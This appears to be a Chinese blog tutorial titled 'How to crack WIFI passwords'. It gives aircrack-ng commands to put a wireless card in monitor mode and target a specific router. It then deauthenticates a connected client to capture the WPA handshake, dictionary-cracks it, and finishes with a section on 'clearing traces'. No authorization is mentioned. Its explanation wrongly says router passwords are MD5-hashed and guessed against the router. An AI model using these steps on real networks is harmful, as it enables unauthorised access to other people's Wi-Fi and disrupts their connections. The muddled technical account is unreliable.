晓生阑珊

如何破解WIFI密码

2017-10-23  本文已影响77人  c20af4700344

系统平台:Ubuntu15.04

工 具:aircrack1.2

1、aircrack获取

(1)安装aircrack

下载地址:http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz

命令为 wgethttp://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz

在网页中下载也行

下载下来的是一个压缩包,利用命令

tar -zxvf aircrack-ng-1.2-beta1.tar.gz解压压缩包(aircrack-ng-1.2-beta1.tar.gz 是你下载的压缩包的文件名)

然后用make和make INSTALL安装

(2)配置

安装组件只要输入

sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev

2、wifi破解密码

破解密码的原理是将本机的网卡更改为监听模式监听周围的wifi网络,寻找到目标的MAC地址,然后模拟客户机向对方路由器发送断开链接的请求,而路由器在断开连接的时候会自动链接,这个时候截获路由器的握手包即可,密码文件就包含在其中,之后利用密码字典破解。路由器密码的加密算法一般是MD5等,并且是不可逆的意思是无法从密文揭秘出密码,我们做的是暴力破解,将字典中的密码发送给路由器直到成功为止,所以成功与否和你的密码字典丰富度有关。

(1)、关闭网络和会影响到破解的进程

如果不进行这一步,在进行网络监听的时候会无法获得正确的信息

关闭网络功能

service net-manager stop

关闭相关进程

sudo airmon-ng check kill

(2)、打开网络监听

iwconfig 命令查看本机的网卡,可以看到我的电脑上有一块无线网卡wlan0打开网络监听

airmon-ng start wlan0

wlan0为你选择的网卡的名称,并且我们可以在右下角看到接口名

(3)监听网络wifi

监听所有wifi(这个窗口可以关掉)

sudo airodump-ng mon0

可以看到周围的网络的一些信息,我们要用到的是BSSID,CH,ESSID。BSSID是路由器的MAC地址,CH是路由器wifi所在的频道,ESSID为WIFI的名字。

监听特定的频道

sudo airodump-ng --bssid EC:X:X:X:X:A4 -c 11 -w ./crack/tmp mon0

其中--bssid后的EC:X:X:X:X:A4是我们在上一条命令中读取到的MAC地址;

--c后面的参数是频道

--w后是要写入的文件名称(我写在当前目录下的crack目录中的tmp文件中)

mon0为之前使用到的接口名称

这个窗口不要关闭,也不要结束进程

BSSID下面是我们选定的路由器的MAC地址,STATION下面是链接在路由器上的MAC地址,我们要用到这两个

(4)获取握手包

获取握手数据包,新开一个终端,执行

sudo aireplay-ng -0 2 -a EC:X:X:X:X:A4 -c 04:X:X:X:X:37 mon0

-a后面的参数是我们选择的路由器的MAC地址

-c后面的参数是对应的客户机的MAC地址

当上一步时间后面出现WAP handshake时说明获取成功

(5)破解密码

当出现WPA handshake时表示握手成功即可破解文件

然后执行

aircrack-ng -w 1.txt tmp-02.cap

1.txt为密码字典文件

tmp-02.cap为握手文件

这个过程需要等待,执行速度和计算机的性能有关,可能并不能发现密码,可以多换几个密码字典尝试

字典文件百度下载即可。

3、清除痕迹

执行下面两条命令

关闭网络监听

airmon-ng stop mon0

打开网络

service network-manager start

上一篇下一篇

猜你喜欢

热点阅读